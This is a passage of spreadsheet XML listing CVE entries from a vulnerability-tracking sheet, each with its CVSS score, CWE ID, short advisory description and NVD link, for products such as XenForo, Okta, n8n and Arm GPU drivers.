r="A1460" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1460" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1460" s="5" t="inlineStr"><is><t>CVE-2026-78631</t></is></c><c r="D1460" s="5" t="n"><v>5.3</v></c><c r="E1460" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1460" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1460" s="5" t="inlineStr" /><c r="H1460" s="5" t="n"><v>0.001</v></c><c r="I1460" s="5" t="inlineStr" /><c r="J1460" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1460" s="5" t="inlineStr" /><c r="L1460" s="5" t="inlineStr" /><c r="M1460" s="5" t="inlineStr" /><c r="N1460" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1460" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1460" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1460" s="5" t="inlineStr" /><c r="R1460" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="S1460" s="5" t="inlineStr"><is><t>The Okta Hyperdrive Agent writes the decoded SAML bearer assertion to a local application log file at the default log level on every successful MFA completion. This insertion of sensitive information into the log file makes a live authentication credential readable by any local user with access to the log file.</t></is></c><c r="T1460" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78631</t></is></c></row><row r="1461"><c r="A1461" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1461" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1461" s="5" t="inlineStr"><is><t>CVE-2026-81380</t></is></c><c r="D1461" s="5" t="n"><v>5.3</v></c><c r="E1461" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1461" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1461" s="5" t="inlineStr" /><c r="H1461" s="5" t="n"><v>0.006</v></c><c r="I1461" s="5" t="inlineStr" /><c r="J1461" s="5" t="inlineStr" /><c r="K1461" s="5" t="inlineStr" /><c r="L1461" s="5" t="inlineStr" /><c r="M1461" s="5" t="inlineStr" /><c r="N1461" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1461" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1461" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1461" s="5" t="inlineStr" /><c r="R1461" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="S1461" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1461" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81380</t></is></c></row><row r="1462"><c r="A1462" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1462" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1462" s="5" t="inlineStr"><is><t>CVE-2026-86080</t></is></c><c r="D1462" s="5" t="n"><v>5.3</v></c><c r="E1462" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1462" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1462" s="5" t="inlineStr" /><c r="H1462" s="5" t="n"><v>0.002</v></c><c r="I1462" s="5" t="inlineStr" /><c r="J1462" s="5" t="inlineStr" /><c r="K1462" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1462" s="5" t="inlineStr" /><c r="M1462" s="5" t="inlineStr" /><c r="N1462" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1462" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1462" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1462" s="5" t="inlineStr" /><c r="R1462" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S1462" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the GitHub Trigger generated a webhook secret but discarded it when GitHub returned HTTP 422 and the node reused an existing webhook. Workflow static data then retained webhookId without webhookSecret, and X-Hub-Signature-256 verification accepted deliveries without a stored secret. The affected logic includes packages/nodes-base/nodes/Github/GithubTriggerHelpers.ts and the 422 webhook reuse path. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t></is></c><c r="T1462" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86080</t></is></c></row><row r="1463"><c r="A1463" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1463" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1463" s="5" t="inlineStr"><is><t>CVE-2026-86714</t></is></c><c r="D1463" s="5" t="n"><v>5.3</v></c><c r="E1463" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1463" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1463" s="5" t="inlineStr" /><c r="H1463" s="5" t="n"><v>0.002</v></c><c r="I1463" s="5" t="inlineStr" /><c r="J1463" s="5" t="inlineStr" /><c r="K1463" s="5" t="inlineStr" /><c r="L1463" s="5" t="inlineStr" /><c r="M1463" s="5" t="inlineStr" /><c r="N1463" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1463" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1463" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1463" s="5" t="inlineStr" /><c r="R1463" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1463" s="5" t="inlineStr"><is><t>PX4 Autopilot through 1.17.0 contains a stack buffer over-read vulnerability in the netman system command that fails to validate interface name length. Attackers can supply interface names of 74 bytes or more via the -i option to read beyond buffer boundaries, leaking stack memory to console output or writing it into persistent network configuration files.</t></is></c><c r="T1463" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86714</t></is></c></row><row r="1464"><c r="A1464" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1464" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1464" s="5" t="inlineStr"><is><t>CVE-2026-86719</t></is></c><c r="D1464" s="5" t="n"><v>5.3</v></c><c r="E1464" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1464" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1464" s="5" t="inlineStr" /><c r="H1464" s="5" t="n"><v>0.001</v></c><c r="I1464" s="5" t="inlineStr" /><c r="J1464" s="5" t="inlineStr" /><c r="K1464" s="5" t="inlineStr" /><c r="L1464" s="5" t="inlineStr" /><c r="M1464" s="5" t="inlineStr" /><c r="N1464" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1464" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1464" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1464" s="5" t="inlineStr" /><c r="R1464" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1464" s="5" t="inlineStr"><is><t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 (master) contains a cross-site request forgery vulnerability in the CustomizeUser plugin endpoint plugin/CustomizeUser/swapUser.json.php. The endpoint takes users_id from $_REQUEST and invokes User::swapUser() without calling forbidIfNotPost() or forbidIfInvalidToken(), and the global autoCSRFGuard() check only runs for POST requests to *.json.php, so the action is reachable via GET. An attacker who causes an authenticated administrator's browser to issue a cross-origin GET (for example via an &lt;img&gt; tag or link) can replace that administrator's session with a non-admin user account, causing the administrator to lose administrative access until the swap is cancelled; swapping to another administrator account is rejected, so this is not privilege escalation. The JSON response also discloses the session_id. The CustomizeUser plugin is enabled by default, and no patch was available at the time of publication.</t></is></c><c r="T1464" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86719</t></is></c></row><row r="1465"><c r="A1465" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1465" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1465" s="5" t="inlineStr"><is><t>CVE-2026-86737</t></is></c><c r="D1465" s="5" t="n"><v>5.3</v></c><c r="E1465" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1465" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1465" s="5" t="inlineStr" /><c r="H1465" s="5" t="n"><v>0.002</v></c><c r="I1465" s="5" t="inlineStr" /><c r="J1465" s="5" t="inlineStr" /><c r="K1465" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L1465" s="5" t="inlineStr" /><c r="M1465" s="5" t="inlineStr" /><c r="N1465" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1465" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1465" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1465" s="5" t="inlineStr" /><c r="R1465" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1465" s="5" t="inlineStr"><is><t>snipe-it versions before 8.7.0 fail to enforce asset view authorization in the GET /hardware/{asset}/barcode endpoint. Authenticated attackers can iterate asset IDs to retrieve barcodes and enumerate asset tags across tenants, including soft-deleted and cross-company assets.</t></is></c><c r="T1465" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86737</t></is></c></row><row r="1466"><c r="A1466" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1466" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1466" s="5" t="inlineStr"><is><t>CVE-2026-11891</t></is></c><c r="D1466" s="5" t="n"><v>5.1</v></c><c r="E1466" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1466" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1466" s="5" t="inlineStr" /><c r="H1466" s="5" t="n"><v>0.001</v></c><c r="I1466" s="5" t="inlineStr" /><c r="J1466" s="5" t="inlineStr" /><c r="K1466" s="5" t="inlineStr" /><c r="L1466" s="5" t="inlineStr" /><c r="M1466" s="5" t="inlineStr" /><c r="N1466" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1466" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1466" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1466" s="5" t="inlineStr" /><c r="R1466" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1466" s="5" t="inlineStr"><is><t>Use After Free vulnerability in Arm Ltd Valhall GPU Userspace Driver, Arm Ltd Arm 5th Gen GPU Architecture Userspace Driver allows a non-privileged user process to perform valid GPU processing operations, including via WebGL or WebGPU, to access already freed memory.



This issue affects Valhall GPU Userspace Driver: from r46p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Userspace Driver: from r46p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T1466" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-11891</t></is></c></row><row r="1467"><c r="A1467" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1467" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1467" s="5" t="inlineStr"><is><t>CVE-2026-12387</t></is></c><c r="D1467" s="5" t="n"><v>5.1</v></c><c r="E1467" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1467" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1467" s="5" t="inlineStr" /><c r="H1467" s="5" t="n"><v>0.001</v></c><c r="I1467" s="5" t="inlineStr" /><c r="J1467" s="5" t="inlineStr" /><c r="K1467" s="5" t="inlineStr" /><c r="L1467" s="5" t="inlineStr" /><c r="M1467" s="5" t="inlineStr" /><c r="N1467" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1467" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1467" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1467" s="5" t="inlineStr" /><c r="R1467" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1467"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r41p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T1467" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12387</t></is></c></row><row r="1468"><c r="A1468" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1468" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1468" s="5" t="inlineStr"><is><t>CVE-2026-33387</t></is></c><c r="D1468" s="5" t="n"><v>5.1</v></c><c r="E1468" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1468" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1468" s="5" t="inlineStr" /><c r="H1468" s="5" t="n"><v>0.002</v></c><c r="I1468" s="5" t="inlineStr" /><c r="J1468" s="5" t="inlineStr" /><c r="K1468" s="5" t="inlineStr" /><c r="L1468" s="5" t="inlineStr" /><c r="M1468" s="5" t="inlineStr" /><c r="N1468" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1468" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1468" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1468" s="5" t="inlineStr" /><c r="R1468" s="5" t="inlineStr"><is><t>CWE-1336</t></is></c><c r="S1468" s="5" t="inlineStr"><is><t>A template injection vulnerability was discovered in the Dashboards functionality due to improper validation of an input parameter. An authenticated user with the required privileges can define a dashboard containing a malicious payload, or a victim can be socially engineered into importing a malicious dashboard. When the victim views or imports the dashboard, the payload executes in their browser context, allowing the attacker to modify application data or disrupt application availability.</t></is></c><c r="T1468" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33387</t></is></c></row><row r="1469"><c r="A1469" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1469" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1469" s="5" t="inlineStr"><is><t>CVE-2026-33920</t></is></c><c r="D1469" s="5" t="n"><v>5.1</v></c><c r="E1469" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1469" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1469" s="5" t="inlineStr" /><c r="H1469" s="5" t="n"><v>0.001</v></c><c r="I1469" s="5" t="inlineStr" /><c r="J1469" s="5" t="inlineStr" /><c r="K1469" s="5" t="inlineStr" /><c r="L1469" s="5" t="inlineStr" /><c r="M1469" s="5" t="inlineStr" /><c r="N1469" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1469" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1469" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1469" s="5" t="inlineStr" /><c r="R1469" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1469" s="5" t="inlineStr"><is><t>A cross-site request forgery vulnerability was discovered in the login functionality (both standard and SAML) due to missing validation of the anti-CSRF token. An attacker with a valid account can trick a victim into unknowingly authenticating with the attacker's credentials. Any operation performed by the victim in this state is attributed to the attacker's account, compromising the integrity of the audit trail.</t></is></c><c r="T1469" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33920</t></is></c></row><row r="1470"><c r="A1470" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1470" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1470" s="5" t="inlineStr"><is><t>CVE-2026-73317</t></is></c><c r="D1470" s="5" t="n"><v>5.1</v></c><c r="E1470" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1470" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1470" s="5" t="inlineStr" /><c r="H1470" s="5" t="n"><v>0.003</v></c><c r="I1470" s="5" t="inlineStr" /><c r="J1470" s="5" t="inlineStr" /><c r="K1470" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1470" s="5" t="inlineStr" /><c r="M1470" s="5" t="inlineStr" /><c r="N1470" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1470" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1470" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1470" s="5" t="inlineStr" /><c r="R1470" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1470" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a missing authorization vulnerability in the ACP cache-rebuild dispatcher that allows limited administrators with only the rebuildCache permission to perform unauthorized approval queue actions by supplying an arbitrary job class and actor user ID in the POST body. Attackers can invoke the approval queue job under any user identity to approve queued user registrations without holding the required approval-queue or moderator permissions, causing the moderation log to attribute actions to an impersonated account.</t></is></c><c r="T1470" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73317</t></is></c></row><row r="1471"><c r="A1471" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1471" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1471" s="5" t="inlineStr"><is><t>CVE-2026-73318</t></is></c><c r="D1471" s="5" t="n"><v>5.1</v></c><c r="E1471" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1471" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1471" s="5" t="inlineStr" /><c r="H1471" s="5" t="n"><v>0.003</v></c><c r="I1471" s="5" t="inlineStr" /><c r="J1471" s="5" t="inlineStr" /><c r="K1471" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1471" s="5" t="inlineStr" /><c r="M1471" s="5" t="inlineStr" /><c r="N1471" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1471" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1471" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1471" s="5" t="inlineStr" /><c r="R1471" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1471" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a missing authorization vulnerability in the force-agreement controller that allows any ACP administrator to access and submit force-agreement forms regardless of their assigned permissions. Attackers can bypass the option permission declared in the navigation configuration to update the global policy last-updated timestamp, forcing all users to re-agree to the privacy policy or terms of service.</t></is></c><c r="T1471" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73318</t></is></c></row><row r="1472"><c r="A1472" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1472" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1472" s="5" t="inlineStr"><is><t>CVE-2026-73319</t></is></c><c r="D1472" s="5" t="n"><v>5.1</v></c><c r="E1472" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1472" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1472" s="5" t="inlineStr" /><c r="H1472" s="5" t="n"><v>0.003</v></c><c r="I1472" s="5" t="inlineStr" /><c r="J1472" s="5" t="inlineStr" /><c r="K1472" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1472" s="5" t="inlineStr" /><c r="M1472" s="5" t="inlineStr" /><c r="N1472" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1472" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1472" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1472" s="5" t="inlineStr" /><c r="R1472" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1472" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a cross-site scripting vulnerability in the dynamic redirect handler that allows unauthenticated attackers to execute arbitrary JavaScript in the board origin by crafting a malicious javascript: URI that bypasses host validation. Attackers can embed the board hostname in the URI authority component and use percent-encoded newlines to evade server-side filters, causing authenticated users who perform a Follow action to execute attacker-supplied JavaScript in their browser.</t></is></c><c r="T1472" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73319</t></is></c></row><row r="1473"><c r="A1473" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1473" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1473" s="5" t="inlineStr"><is><t>CVE-2026-73320</t></is></c><c r="D1473" s="5" t="n"><v>5.1</v></c><c r="E1473" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1473" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1473" s="5" t="inlineStr" /><c r="H1473" s="5" t="n"><v>0.003</v></c><c r="I1473" s="5" t="inlineStr" /><c r="J1473" s="5" t="inlineStr" /><c r="K1473" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1473" s="5" t="inlineStr" /><c r="M1473" s="5" t="inlineStr" /><c r="N1473" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1473" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1473" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1473" s="5" t="inlineStr" /><c r="R1473" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1473" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains an unauthenticated information disclosure vulnerability that allows unauthenticated attackers to retrieve private unfurl records by supplying predictable auto-increment primary key IDs to the unfurl endpoint. Attackers can enumerate or predict result IDs and query the endpoint without any session, user, or visibility checks to obtain rendered preview HTML, original URLs, and query strings from private conversations and other restricted content.</t></is></c><c r="T1473" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73320</t></is></c></row><row r="1474"><c r="A1474" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1474" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1474" s="5" t="inlineStr"><is><t>CVE-2026-84386</t></is></c><c r="D1474" s="5" t="n"><v>5.1</v></c><c r="E1474" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1474" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1474" s="5" t="inlineStr" /><c r="H1474" s="5" t="n"><v>0.001</v></c><c r="I1474" s="5" t="inlineStr" /><c r="J1474" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1474" s="5" t="inlineStr" /><c r="L1474" s="5" t="inlineStr" /><c r="M1474" s="5" t="inlineStr" /><c r="N1474" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1474" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1474" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1474" s="5" t="inlineStr" /><c r="R1474" s="5" t="inlineStr"><is><t>CWE-283</t></is></c><c r="S1474" s="5" t="inlineStr"><is><t>A unverified ownership vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.7, FortiClientWindows 7.2 all versions may allow attacker to improper access control via &lt;insert attack vector here&gt;</t></is></c><c r="T1474" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84386</t></is></c></row><row r="1475"><c r="A1475" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1475" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1475" s="5" t="inlineStr"><is><t>CVE-2026-86516</t></is></c><c r="D1475" s="5" t="n"><v>5.1</v></c><c r="E1475" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1475" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1475" s="5" t="inlineStr" /><c r="H1475" s="5" t="n"><v>0.002</v></c><c r="I1475" s="5" t="inlineStr" /><c r="J1475" s="5" t="inlineStr" /><c r="K1475" s="5" t="inlineStr" /><c r="L1475" s="5" t="inlineStr" /><c r="M1475" s="5" t="inlineStr" /><c r="N1475" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1475" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1475" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1475" s="5" t="inlineStr" /><c r="R1475" s="5" t="inlineStr"><is><t>CWE-266, CWE-269</t></is></c><c r="S1475" s="5" t="inlineStr"><is><t>A vulnerability was detected in elenavanengelenmaslova mocknest-serverless 0.9.0. The affected element is an unknown function of the file deployment/aws/shared/github-oidc-role.yaml of the component AWS GitHub OIDC Deployment Helper Script. Performing a manipulation results in improper privilege management. It is possible to initiate the attack remotely. The patch is named 6ab3147282d867c1993f995272750db091c2290b. Applying a patch is the recommended action to fix this issue.</t></is></c><c r="T1475" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86516</t></is></c></row><row r="1476"><c r="A1476" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1476" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1476" s="5" t="inlineStr"><is><t>CVE-2026-72976</t></is></c><c r="D1476" s="5" t="n"><v>5</v></c><c r="E1476" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1476" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1476" s="5" t="inlineStr" /><c r="H1476" s="5" t="n"><v>0.004</v></c><c r="I1476" s="5" t="inlineStr" /><c r="J1476" s="5" t="inlineStr" /><c r="K1476" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1476" s="5" t="inlineStr" /><c r="M1476" s="5" t="inlineStr" /><c r="N1476" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1476" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1476" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1476" s="5" t="inlineStr" /><c r="R1476" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1476" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an authorized attacker to disclose information locally.</t></is></c><c r="T1476" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72976</t></is></c></row><row r="1477"><c r="A1477" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1477" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1477" s="5" t="inlineStr"><is><t>CVE-2026-78635</t></is></c><c r="D1477" s="5" t="n"><v>5</v></c><c r="E1477" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1477" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1477" s="5" t="inlineStr" /><c r="H1477" s="5" t="n"><v>0.002</v></c><c r="I1477" s="5" t="inlineStr" /><c r="J1477" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1477" s="5" t="inlineStr" /><c r="L1477" s="5" t="inlineStr" /><c r="M1477" s="5" t="inlineStr" /><c r="N1477" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1477" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1477" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1477" s="5" t="inlineStr" /><c r="R1477" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="S1477" s="5" t="inlineStr"><is><t>The Okta Privileged Access client URL handler does not insert an option terminator before appending the target value to the command-line arguments. When a scaleft:// protocol handler link contains a value beginning with a hyphen, the underlying CLI framework interprets it as a command-line flag, causing unintended modification of the SSH client's behavior.</t></is></c><c r="T1477" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78635</t></is></c></row><row r="1478"><c r="A1478" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1478" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1478" s="5" t="inlineStr"><is><t>CVE-2026-79904</t></is></c><c r="D1478" s="5" t="n"><v>5</v></c><c r="E1478" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1478" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1478" s="5" t="inlineStr" /><c r="H1478" s="5" t="n"><v>0.001</v></c><c r="I1478" s="5" t="inlineStr" /><c r="J1478" s="5" t="inlineStr" /><c r="K1478" s="5" t="inlineStr"><is><t>adobe:photoshop_mobile</t></is></c><c r="L1478" s="5" t="inlineStr" /><c r="M1478" s="5" t="inlineStr" /><c r="N1478" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1478" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1478" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1478" s="5" t="inlineStr" /><c r="R1478" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1478" s="5" t="inlineStr"><is><t>Photoshop Mobile is affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to access unauthorized files or directories outside the intended restrictions. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1478" s="6" 